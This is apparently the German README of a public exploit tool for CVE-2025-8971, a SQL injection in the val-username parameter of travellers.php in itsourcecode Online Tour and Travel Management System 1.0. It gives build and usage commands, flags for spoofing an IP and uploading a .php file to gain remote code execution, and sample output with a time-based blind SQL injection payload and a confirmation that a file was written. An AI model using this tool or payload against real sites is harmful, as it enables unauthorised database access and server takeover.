
SQL-Injection in itsourcecode Online Tour and Travel Management System 1.0.
Autor: Byte Reaper
Dieser Exploit für CVE-2025-8971 nutzt eine SQL-Injektions-Schwachstelle in itsourcecode Online Tour and Travel Management System 1.0 aus. Die Schwachstelle befindet sich in /admin/operations/travellers.php und kann remote über den Parameter val-username ausgenutzt werden.
So funktioniert es
Der Exploit sendet manipulierte HTTP-POST-Anfragen an die Ziel-URL.
Payloads werden kodiert und in val-username injiziert.
Optional kann ein Dateiupload (.php oder Bild) verwendet werden, um eine Remote-Codeausführung zu erreichen.
Das Skript überprüft die Antworten, um festzustellen, ob der Payload erfolgreich ausgeführt wurde.
GCC Compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<ziel> -v [ausführlicher Modus]
-h, --help Hilfemeldung
-u, --url Ziel-URL (BASE-URL)
-c, --cookies Cookie-Datei
-i, --ip Gefälschte IP (Host-Anfrage)
-f, --file Dateiupload (.php / Bild)
-v, --verbose Ausführlicher Modus
[+] Starte Kodierung des Payloads in der Anfrage (username=)
[+] Kodierter Payload: AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Ursprünglicher Payload (unkodiert): AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST-Anfrage gesendet
[+] Vollständige URL: http://127.0.0.1/code/admin/operations/travellers.php
[+] Dateiupload: test.php
[+] Datei erfolgreich geschrieben
....
MIT License